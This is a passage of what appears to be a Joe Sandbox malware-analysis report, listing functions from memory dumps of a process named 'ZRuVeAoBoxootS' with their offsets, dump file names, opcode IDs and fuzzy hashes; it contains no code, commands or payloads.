                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6d1a9d4d219e6d76e5f03cfb7a766e225b705c28e50216445c5c49c563a67e0
                        • Instruction ID: 5c4df53bdef32d8a21308a1a1575d1b4b0073a28329eee02cdbf22d6fb320098
                        • Opcode Fuzzy Hash: b6d1a9d4d219e6d76e5f03cfb7a766e225b705c28e50216445c5c49c563a67e0
                        • Instruction Fuzzy Hash: 8521D075604204EFDB24DF28D984B26BBA5EF88214F20C5ADE84A4B246C33AD447CE62
                        Function 04F39008 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6498e493ab70982ae99f69d1b1561a53fef417324f2b4041c9ff087b45ff7d0
                        • Instruction ID: e5d1be0a57b47485968401bef041791229f7edf0e6a4429cb9a89745a46a2a44
                        • Opcode Fuzzy Hash: b6498e493ab70982ae99f69d1b1561a53fef417324f2b4041c9ff087b45ff7d0
                        • Instruction Fuzzy Hash: 4B2129747112108FD758EB39C494E6A73E6EF85725B1084AED506CB3A0DBB6EC02CB51
                        Function 04F36820 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b355ec1a8a7371676cfb8edcb6594d3e20bad58b8795f4f70a8a7805d27feab
                        • Instruction ID: bfe9ba92536603b2340242cc996a834958d46f0df8f481f7af16846f75e635e4
                        • Opcode Fuzzy Hash: 1b355ec1a8a7371676cfb8edcb6594d3e20bad58b8795f4f70a8a7805d27feab
                        • Instruction Fuzzy Hash: 7821B031A10709DFDB00EF69C8848ADB3B1FF8931474186A9E549AB321EB30E944CB81
                        Function 04F363B2 Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77c5845aa27a07aa1071b00e32f85a2ef66b2ff76869449b361602265daa5e90
                        • Instruction ID: 915425d4fd649052bd356757d93a5432ca3cf2a9230afb5dc1744f14840796e8
                        • Opcode Fuzzy Hash: 77c5845aa27a07aa1071b00e32f85a2ef66b2ff76869449b361602265daa5e90
                        • Instruction Fuzzy Hash: FF31F574E01208AFEB20CF55D594B9EBBF2FF88311F258069E945AB750CB31AD51CB64
                        Function 04F36C31 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b111a180353f8e7003dfee82847cd49cb65d99a754154fce32341bb8ce1a6290
                        • Instruction ID: 2c43c069d84ee4e52a8bb0978dde3b5dfd27b221d4fd65936d7f75f44c9fb865
                        • Opcode Fuzzy Hash: b111a180353f8e7003dfee82847cd49cb65d99a754154fce32341bb8ce1a6290
                        • Instruction Fuzzy Hash: 5D21C231A01705EBEB25EF69C88055AB7A1EF88325B10C96DD909AB345DB31FC86CB80
                        Function 04F38D30 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e23d91bed6286c24411fede286598fe2fdeb9425734ce42bf77e53a0f342ae0e
                        • Instruction ID: 32c006556fafda418ab8fa3dd38e6b9d9d5a14f1b9e556da9afa3e50805725db
                        • Opcode Fuzzy Hash: e23d91bed6286c24411fede286598fe2fdeb9425734ce42bf77e53a0f342ae0e
                        • Instruction Fuzzy Hash: D611B431F00A158BDB25FEA9C8412BEB7F6EFC4751F04862AE505A7300DB78B90287D1
                        Function 04F31B99 Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2aabe047816926f4cc77703cc3cb87df976c8fc2f8d1a3f24a04e07bf773a945
                        • Instruction ID: 2e3e6026d6eeea9dbd3d36d449470b9fbff4b674088ec01f28f85ca766e1eefe
                        • Opcode Fuzzy Hash: 2aabe047816926f4cc77703cc3cb87df976c8fc2f8d1a3f24a04e07bf773a945
                        • Instruction Fuzzy Hash: 1311E471A002088FD711DF68C5548EBBBF6EF84715B1088A9D106EB390EF30ED0A8F91
                        Function 04F358B8 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ce58c9e1d7b7fd5ea80efe18f7dbb2b90a1c7f13aa3eef40d755a741d1e9247
                        • Instruction ID: 163fef95f9fe3f772394868fbe8e0940de6c3505c5bb983f325ddc1bcace1fae
                        • Opcode Fuzzy Hash: 6ce58c9e1d7b7fd5ea80efe18f7dbb2b90a1c7f13aa3eef40d755a741d1e9247
                        • Instruction Fuzzy Hash: CB21F670D012499FEB05EBB4E8905EE7BF2EF85310F004569C1056F191EF316A0ACFA2
                        Function 0271D007 Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6788f0dadaf38c2f1d42f868ffc64a0817c4218289c297ba3c9b11e848552f78
                        • Instruction ID: 54611b81b1628e9fedc13c2d1d4c251a0c73d83a6887b1f1a44188f1a90dd0fc
                        • Opcode Fuzzy Hash: 6788f0dadaf38c2f1d42f868ffc64a0817c4218289c297ba3c9b11e848552f78
                        • Instruction Fuzzy Hash: 6D215E755093808FDB12CF24D994715BF71EF46214F28C5EAD8898F6A7C33A984ACB62
                        Function 04F38D2B Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df0e5a27963f8f46fc05ca27aafd92e58e1600cdc3882476dcd35a6db1d150c1
                        • Instruction ID: ebeaa20afab4883ba63b8786bcc6829fc006e5ae6f7536513d5f70698956a2bd
                        • Opcode Fuzzy Hash: df0e5a27963f8f46fc05ca27aafd92e58e1600cdc3882476dcd35a6db1d150c1
                        • Instruction Fuzzy Hash: 0911A032F006158BEB24EEA998412AFB7F6EBC4691F14852AE506E7304D678B90287D1
                        Function 04F39739 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d0f5d976d1470d5281208a1c0584a9a0c691c29a182794d0d7be477a275dfd7b
                        • Instruction ID: 6c9d7722cf99e1583f048a61353ac66c72585c010f1d900c92ac2ff8047815a1
                        • Opcode Fuzzy Hash: d0f5d976d1470d5281208a1c0584a9a0c691c29a182794d0d7be477a275dfd7b
                        • Instruction Fuzzy Hash: 40217C31600705DFDB65FB74C840BAAB3F6EF85216F04886DD4594B260DF79B88ACB82
                        Function 04F38A4C Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45bf010cfbfb4f12345c83086ebe8b4a5af9a291ff66740501ed37368c1b5c58
                        • Instruction ID: 5024cf3bf1773f8ab371c7376243f35efd5f6a47933b4a71a0ad3664479e3a6b
                        • Opcode Fuzzy Hash: 45bf010cfbfb4f12345c83086ebe8b4a5af9a291ff66740501ed37368c1b5c58
                        • Instruction Fuzzy Hash: 39217F31600705DFDB54FB74C840AAAB3F6EF85216F00886DE05A5B260DF75B88ACB82
                        Function 04F358C8 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eca123d74420ba284f82ba50a3a6f8b97e19eaa09f09be848950503f503e60cb
                        • Instruction ID: c290f9b0a93f2831ab28c0e3a73f4189cbe299609bbf651477a5ec38b7bc7d9b
                        • Opcode Fuzzy Hash: eca123d74420ba284f82ba50a3a6f8b97e19eaa09f09be848950503f503e60cb
                        • Instruction Fuzzy Hash: A9118470E012099FEB05EBB4E8519EE7BF6EF85710F004569C1057B294DF31AA09CFA6
                        Function 0270D4BF Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675054945.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_270d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                        • Instruction ID: b75c8c668676bccef1c43e7d075e9c0843ed773064d67e26e0cf225de6aec80f
                        • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                        • Instruction Fuzzy Hash: 1F11B176504280CFCB26CF54D5C4B1ABFB2FB88318F24C6A9DC490B696C336D45ACBA1
                        Function 04F3BE39 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c09a1232f43ee6c6431b98744c78d91899eefd7eac55fc7d777132ae714f3d01
                        • Instruction ID: efe821d74e93e62daef1672963e475408a23f9e59d7b1a39bd6d0bbf7814274e
                        • Opcode Fuzzy Hash: c09a1232f43ee6c6431b98744c78d91899eefd7eac55fc7d777132ae714f3d01
                        • Instruction Fuzzy Hash: 5011C4367101118FE7248A6CC8997A93BD2EF85311F19C0B9E549DF3A3DA39EC028B90
                        Function 04F3A9E1 Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d064c822514fc178b8213e29af96a943f06c186e574fa51cae77474c6b128ffd
                        • Instruction ID: 5b0c1ab45eadfd08c553eac54aea5962b11a6c0a69120a9644a9cd2790120a60
                        • Opcode Fuzzy Hash: d064c822514fc178b8213e29af96a943f06c186e574fa51cae77474c6b128ffd
                        • Instruction Fuzzy Hash: AD11E971A02100DFEB14DF69C94496ABBF6EF89304F14846DD005AF345CA31EC02C795
                        Function 0271D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                        • Instruction ID: 7ed326ee8b181294d85079634775c0dbb3825750b26ec2d24280f834443c95df
                        • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                        • Instruction Fuzzy Hash: E7118B75504280DFDB26CF14D5C4B16BBA2FF84228F24C6AAD8494B696C33AD44ACF61
                        Function 04F31580 Relevance: .1, Instructions: 51COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cdffcc97292803d968865d5593ba2e5d9ce64eca2d7a38a0572860ee120124a
                        • Instruction ID: 6b399994d83732904aaea4f36a26054aaee035019f8cca6c28e2e133851c5ce2
                        • Opcode Fuzzy Hash: 1cdffcc97292803d968865d5593ba2e5d9ce64eca2d7a38a0572860ee120124a
                        • Instruction Fuzzy Hash: C411F3B5D042488FDB10DF9AC944B9EFBF4EB48220F11846AE958B7350D3B4A945CFA5
                        Function 04F31734 Relevance: .1, Instructions: 51COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11ca1f694fdad6b9e7318e562ca27df0b2b6da91b69ae7ee7b964f21acbf134d
                        • Instruction ID: 5126a4efb0bb4827c2b717d90fa4db421fb5cc9a476f73f05adda4179ebee9e6
                        • Opcode Fuzzy Hash: 11ca1f694fdad6b9e7318e562ca27df0b2b6da91b69ae7ee7b964f21acbf134d
                        • Instruction Fuzzy Hash: AB11F3B5D042488FDB10DF9AC544BDEFBF4EB48220F11846AE958B7350D3B4A945CFA5
                        Function 04F3A700 Relevance: .1, Instructions: 51COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1df0428e21b60fe5a6496cf3714dbc2c970ebba625420bf199f3b6e1a6777fbf
                        • Instruction ID: 06d89f4c2e1e0da4d8b238211014a1fbd53cee642c86a485616e86f62358e65d
                        • Opcode Fuzzy Hash: 1df0428e21b60fe5a6496cf3714dbc2c970ebba625420bf199f3b6e1a6777fbf
                        • Instruction Fuzzy Hash: 69118230A00208DBDB14EFA5D454BDEB7F2EF88305F108469D546A7290DB756D06CFA5
                        Function 04F3214A Relevance: .1, Instructions: 51COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38de03d4a0d34ef27b3a368a75de69de5b50891009a204b499a7927682acf3a3
                        • Instruction ID: d578fb3f4f32e12388a1b8fb21c0ebc2707c757eb3a8c42f4b00a5902efbce54
                        • Opcode Fuzzy Hash: 38de03d4a0d34ef27b3a368a75de69de5b50891009a204b499a7927682acf3a3
                        • Instruction Fuzzy Hash: D31104B5C002498FDB10DF9AD444BDEFBF4EB48320F21842AD458A7350D3B8A546CFA5
                        Function 04F332E8 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 894bc4ec662f7e3a89b654f2426b5f1563df31b8cbab895eb04199a7f03417fa
                        • Instruction ID: c94920d36c1598d5fef77ec1f35c1cef023e55ca47ca002bb98e7bf0742c3131
                        • Opcode Fuzzy Hash: 894bc4ec662f7e3a89b654f2426b5f1563df31b8cbab895eb04199a7f03417fa
                        • Instruction Fuzzy Hash: 081133B59043498FDB20DF9AC484BDEFBF4EB48320F10841AE959A7340C378A945CFA5
                        Function 04F3333C Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd102f57cad12eb1ce2f7c860d9624d427e75574b77fa76eba0df73899125abe
                        • Instruction ID: 89bd0d216bb77a317b6aad5a21327361ba271f6c3f4faaa26c45f1e1b6d96845
                        • Opcode Fuzzy Hash: fd102f57cad12eb1ce2f7c860d9624d427e75574b77fa76eba0df73899125abe
                        • Instruction Fuzzy Hash: 551133B59043488FDB20DF9AC484BDEFBF4EB48320F10841AE959A7340C378A945CFA5
                        Function 04F3A6F1 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfc19802574792066ab4c64302b3de1f9a683253da936893d2abadf70f32c59
                        • Instruction ID: 2382ffa63dab9252db19fd55f4ee929b55e1012024d77160d279c180c5973628
                        • Opcode Fuzzy Hash: 6bfc19802574792066ab4c64302b3de1f9a683253da936893d2abadf70f32c59
                        • Instruction Fuzzy Hash: E701F530A002049BE714EFA6D85479E7BF2EF88310F008968C456A72C0DFB46906CBA5
                        Function 0270D745 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675054945.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_270d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0044778ada0c35adb9b984c72c217379ed7dae7ae272ccacbd012598a045178
                        • Instruction ID: 254014dbb96f220133567308446acb90451ceab4603b816e7ad8fd5bbb26c70d
                        • Opcode Fuzzy Hash: c0044778ada0c35adb9b984c72c217379ed7dae7ae272ccacbd012598a045178
                        • Instruction Fuzzy Hash: D501A771104345DBE7309AA5CDC4B66FBD8DF41334F14D51AED191A2C2D379A448CA75
                        Function 04F32688 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 972c1243a4e221aa25a957a32ae3f6a5ea22a4c64ed49b912898f5a38ae0f974
                        • Instruction ID: 7ce779b3190717fce8965335beb075f941cf3c0f2aaf804e27240483de4cecf2
                        • Opcode Fuzzy Hash: 972c1243a4e221aa25a957a32ae3f6a5ea22a4c64ed49b912898f5a38ae0f974
                        • Instruction Fuzzy Hash: 47F0F4B1B002549BDF16ABE49C505FEBB769F88215B140079E505A7380DA201D17C7E6
                        Function 04F3D2B8 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c168617480a40423f9d5b0167b3a4ce5716c00c8f1fd682e6c426b72ed8bc23
                        • Instruction ID: 0f251124900211668148f9a33dbdc73002bdee86902a233df94783453d52d3fa
                        • Opcode Fuzzy Hash: 3c168617480a40423f9d5b0167b3a4ce5716c00c8f1fd682e6c426b72ed8bc23
                        • Instruction Fuzzy Hash: 6B010C31A00705CFD724EF39C45055AB7B6AF85306B50C56ED9869B260EB75F942CB90
                        Function 04F33732 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35fbf347813fc79e15d71df8cc697ad37a48d98b13e2667a21212ff21a70a4e7
                        • Instruction ID: 0fa9b6bd65ddb11851c3768fc56c0e617b6335ca18201a2e288cf17b04d9c726
                        • Opcode Fuzzy Hash: 35fbf347813fc79e15d71df8cc697ad37a48d98b13e2667a21212ff21a70a4e7
                        • Instruction Fuzzy Hash: A01112B58002488FDB20DFAAD484BDEFBF4EB48320F20841AD818A7240C378A945CFA5
                        Function 04F3D2A9 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 511734c62b47e7b94b34e34b95c3ae52a3ca2d3e881cbd2ecdd5be26231bd6d3
                        • Instruction ID: d47a7f8d8fbb97889001f6e86c6323d9d50124cefed081f081d6d72ca6353fe6
                        • Opcode Fuzzy Hash: 511734c62b47e7b94b34e34b95c3ae52a3ca2d3e881cbd2ecdd5be26231bd6d3
                        • Instruction Fuzzy Hash: D7018F31A00B058FD714EF39C44065AB7B5AF85301F40C56ED9869B261EB34F996CB90
                        Function 04F32D30 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e43b369701f0f6f289838778dea81011e837b92f53e2dcc7b41aa8585f0e652d
                        • Instruction ID: 73d2516c0d2785d4e04c068d1f6317b8a2e2c8fa9486686a1647463ece27017a
                        • Opcode Fuzzy Hash: e43b369701f0f6f289838778dea81011e837b92f53e2dcc7b41aa8585f0e652d
                        • Instruction Fuzzy Hash: 33F0B462F082845FE709EBB59C5559F7FEADBC2150B0584FAD005D7292ED74AC038390
                        Function 04F3DA80 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea04c36c7472440531cc54551c8b75bab8fcbed8d7103c1fd6dcfa01553ee6f0
                        • Instruction ID: 8e5d97f8f65380c692748c85e10c06a378da0c242b2191b6bb7934ed3c8e60c3
                        • Opcode Fuzzy Hash: ea04c36c7472440531cc54551c8b75bab8fcbed8d7103c1fd6dcfa01553ee6f0
                        • Instruction Fuzzy Hash: 9901D131A047448BDB02BB78C8106AEB775EFC1216F05469ED94967202EF74B583C796
                        Function 04F32698 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: abbc2475785d6f17f3ccfba72d52743c5c682b08fc3cdfd06b654e59fcb3d91c
                        • Instruction ID: 484118e868c0858d17406d465c4f63ea55f0a531eb222fbe3ec7e9c1256c6cdc
                        • Opcode Fuzzy Hash: abbc2475785d6f17f3ccfba72d52743c5c682b08fc3cdfd06b654e59fcb3d91c
                        • Instruction Fuzzy Hash: A1F09671B001149B9F05B6E89D505FFB7BA9B88615B140028E505A7340DE305D13C7D5
                        Function 04F3B284 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f541f2e242a4d57780103381a528fe9d8bfa75d352f1656a8cf0e0c7283b12bc
                        • Instruction ID: 2607968606056c99e83321834140686d8829738e264def9c0886ecad581d8d40
                        • Opcode Fuzzy Hash: f541f2e242a4d57780103381a528fe9d8bfa75d352f1656a8cf0e0c7283b12bc
                        • Instruction Fuzzy Hash: 67F0E931300521DBE7249E2A88B5A7E73D9DFC46577044429E406C7252EF30FC03D791
                        Function 04F3BC89 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3b228e56afa77d657b8ae63c3fb7ceec95ae394f0f9b0c060667196d3d1beb98
